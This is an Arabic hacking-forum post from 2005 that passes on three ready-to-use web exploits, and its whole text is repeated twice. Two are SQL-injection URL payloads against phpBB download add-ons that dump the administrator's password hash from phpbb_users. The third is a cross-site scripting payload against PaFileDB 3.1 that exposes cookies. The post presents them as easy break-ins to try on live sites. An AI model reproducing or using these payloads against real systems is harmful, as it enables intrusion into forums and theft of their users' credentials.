اميرة الهكر
09-04-2005, 12:38 PM
بسم اللله الرحمن الرحيم
وقل رب زدنى علما
صدق الله العظيم
لقد وصلتنى مجموعة من الثغرات الجديدة عبر الايميل من احد المنتديات العربيه
وحبت ان اضعها فى منتدانا العزيز
1- [منتديات PHPBB Mod
المهم الثغره في ملف dlman.php
كل اللي علي إنك تضيف الكود هذا بعد رابط الموقع
كود:
dlman.php?func=file_info&file_id=-1337/**/union/**/select/**/0,0,0,user_password,0,username,0,0,0,0,0,0,0,0,0,0 ,0,0/**/FROM/**/phpbb_users/**/WHERE/**/user_id=2/**/
وراح تشوف الباسورد المشفر مثل اللي في الصوره
http://membres.lycos.fr/lezrlezr2007/pic/phpdlm.jpg
ثغرة جديدة اليوم في مكتبة البرامج PaFileDB Version 3.1
--------------------------------------------------------------------------------
بسم الله الرحمن الرحيم
أكيد أغلبكم ياشباب يعرف وش هي مكتبة البرامج ويعرف كبر المواقع اللي تستخدمها
هذي ثغرها لها وهي من نوع Xss
والثغره في الإصدار PaFileDB Version 3.1 ومادون
كل اللي عليك انك تضيف الكود هذا بعد رابط الموقع
كود PHP:
pafiledb.php?action=file&id=%22%3E%20%20%3Cscript%3Ealert(document.cookie)% 3C/script%3E
PhpBB 2.0.13+Downloads Mod Exploit
ثغره جديده ياشباب ونزلت قبل دقايق بس
وهي في الاصدار الجديد من منتديات phpBB
الاصدار phpBB 2.13
ويشترط في الثغره أن تكون مفعله عملية التحميل Downloads
وطريقة الاختراق سهله كل اللي عليك انك تضيف الكود هذا
كود PHP:
downloads.php?cat=-1%20UNION%20SELECT%200,user_password,0,0,0,0,0,0,0 %20FROM%20phpbb_users%20WHERE%20user_id=2
بعد رابط المنتدى وراح تشوف الباسورد قدامك مثل اللي بالصوره
http://membres.lycos.fr/lezrlezr2007/pic/phpb13.jpg
ارجوا ان تحوز الثغرات اعجابكم ومستنة تعليقاتكم
وقل رب زدنى علما
صدق الله العظيم
لقد وصلتنى مجموعة من الثغرات الجديدة عبر الايميل من احد المنتديات العربيه
وحبت ان اضعها فى منتدانا العزيز
1- [منتديات PHPBB Mod
المهم الثغره في ملف dlman.php
كل اللي علي إنك تضيف الكود هذا بعد رابط الموقع
كود:
dlman.php?func=file_info&file_id=-1337/**/union/**/select/**/0,0,0,user_password,0,username,0,0,0,0,0,0,0,0,0,0 ,0,0/**/FROM/**/phpbb_users/**/WHERE/**/user_id=2/**/
وراح تشوف الباسورد المشفر مثل اللي في الصوره
http://membres.lycos.fr/lezrlezr2007/pic/phpdlm.jpg
ثغرة جديدة اليوم في مكتبة البرامج PaFileDB Version 3.1
--------------------------------------------------------------------------------
بسم الله الرحمن الرحيم
أكيد أغلبكم ياشباب يعرف وش هي مكتبة البرامج ويعرف كبر المواقع اللي تستخدمها
هذي ثغرها لها وهي من نوع Xss
والثغره في الإصدار PaFileDB Version 3.1 ومادون
كل اللي عليك انك تضيف الكود هذا بعد رابط الموقع
كود PHP:
pafiledb.php?action=file&id=%22%3E%20%20%3Cscript%3Ealert(document.cookie)% 3C/script%3E
PhpBB 2.0.13+Downloads Mod Exploit
ثغره جديده ياشباب ونزلت قبل دقايق بس
وهي في الاصدار الجديد من منتديات phpBB
الاصدار phpBB 2.13
ويشترط في الثغره أن تكون مفعله عملية التحميل Downloads
وطريقة الاختراق سهله كل اللي عليك انك تضيف الكود هذا
كود PHP:
downloads.php?cat=-1%20UNION%20SELECT%200,user_password,0,0,0,0,0,0,0 %20FROM%20phpbb_users%20WHERE%20user_id=2
بعد رابط المنتدى وراح تشوف الباسورد قدامك مثل اللي بالصوره
http://membres.lycos.fr/lezrlezr2007/pic/phpb13.jpg
ارجوا ان تحوز الثغرات اعجابكم ومستنة تعليقاتكم